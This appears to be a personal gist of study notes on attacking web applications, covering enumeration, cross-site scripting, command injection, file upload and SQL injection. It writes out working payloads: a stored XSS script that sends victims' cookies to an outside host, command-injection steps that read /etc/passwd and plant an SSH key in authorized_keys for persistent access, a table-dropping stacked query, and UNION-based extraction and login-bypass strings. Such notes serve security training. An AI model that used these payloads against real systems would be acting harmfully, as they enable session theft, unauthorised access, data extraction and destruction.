@ZacFran
Last active August 15, 2023 21:44

Notes

  • Hyper-Text Transfer Protocol
    HTTP methods
    Response Codes
    HTTP Fields
wget -r -l2 -P /tmp ftp://ftpserver/ # recursive download, two levels deep, saved under /tmp
wget --save-cookies cookies.txt --keep-session-cookies --post-data 'user=1&password=2' https://website # log in via POST and save the session cookies
wget --load-cookies cookies.txt -p https://website/interesting/article.php # reuse the saved cookies to fetch a page and its page requisites
  • More Scripts
  • JavaScript
    allows websites to interact with the client
    JavaScript runs on the client's machine

Enumeration

  • ROBOTS.TXT
    provides web crawlers with a list of directories
nmap -v -sT -T5 --script http-enum.nse <target ips>
nmap -v -sT -T5 --script http-robots.txt.nse <target ips>
nmap -Pn -T5 -sT --script http-sql-injection.nse <IP>
*** nikto -h <target ip> ***

Cross-Site Scripting (XSS)

  • Reflected
    client side
    Transient, occurs in error messages or search results
    URLs can be Base64 encoded
  • Stored
    Resides on the vulnerable site
    Only requires the user to visit
# this will steal cookies from a message board
<script>document.location="http://10.50.20.97/Cookie_Stealer1.php?username=" + document.cookie;</script>

Server-Side Injection

Directory traversal: the ability to traverse directories on the server
Use relative paths ../../../

Command Injection

  • the ability to run commands on a server
# The ';' semicolon allows you to inject commands
; cat /etc/passwd


# method to add an ssh public key to an http server
ssh-keygen -t rsa # local side
cat ~/.ssh/id_rsa.pub # copy the full text
# command injection
; whoami # the user the webserver is logged in as
; cat /etc/passwd # to find the home directory
; ls -la <home directory> # check to see if the directory is created
; mkdir /home/dir # if the webserver user hasn't logged on
; echo "<public key> student@lin-op" >> /home/dir/.ssh/authorized_keys # add a new authorized_key
; cat /home/dir/.ssh/authorized_keys # check

Malicious File Upload

When a server allows you to upload a file without validation,
you can upload a .php file that gives you a shell.
Then you can use the shell to do command injection.

Structured Query Language

a standard database management language
SQL Commands

SHOW databases;
SHOW TABLES FROM session;
SELECT * FROM session.car;
USE session;
SHOW Tables;
DESCRIBE car;
SELECT * FROM car;
SELECT * FROM car UNION SELECT tireid,name,size,cost,1,2 FROM Tires;
  • SQL Injection
    uses a valid query from the client side
  • Unsanitized Fields
    the input field is vulnerable to basic SQL injection
    Found using a single quote '
  • Sanitized Fields
    the input fields are checked to prevent harm to the database
# Truth Statement
USE session;
SELECT id FROM user WHERE name='tom' OR 1=1; 
# This works because the OR clause 1=1 is true, so the database will return all entries housed in the id field



# Stacking Statement
# Chaining multiple statements together using a semicolon
# some servers do not allow stacking statements
SELECT * FROM user WHERE id='Johnny'; DROP TABLE Customers; --'
# Nesting statements
<INITIAL QUERY> UNION SELECT 1,2,name FROM user; -- This is the Nested Statement added to the query below

SELECT carid, name, (SELECT SUM(cost) FROM Tires WHERE name = "goodyear") FROM car WHERE name = "ford" UNION SELECT 1,2,name FROM user;


# Comment abuse
# use a comment like # or -- within a query so the server-side remainder of the query is ignored
# Input to Inject:
1 or 1=1; #
# Server-Side Query becomes:
SELECT product FROM item WHERE id = 1 or 1=1; # limit 1;


# Blind SQL injection:

# Occurs when an attacker sends TRUE/FALSE statements to determine how the database is configured.

<URL>/uniondemo.php?Selection=2 UNION SELECT 1,2   # GET METHOD, enter in the URL
Audi' UNION SELECT 1,2,3,4 #                      # POST METHOD, enter in the Input Field
Abuse The Client (GET METHOD)

Passing injection through the URL:

After .php?item=4, append your UNION statement


prices.php?item=4 UNION SELECT 1,2


prices.php?item=4 UNION SELECT 1,2,@@version
# @@version returns the SQL server's version information



### GET Method ###
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1; -- fuzzed pages
<URL>/placeholder.php?<DataBase>=<1.2.3.....> UNION SELECT table_schema,column_name,table_name FROM information_schema.columns -- golden statement
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1;

### POST Method ###
tom' OR 1=1 #
press F12 (browser developer tools)
copy the raw SQL from the POST request
xfreerdp # RDP to a Windows box on port 3389

net group
net users
whoami
net localgroup
### gui ###
regedit
  Run
  RunOnce
services
schtasks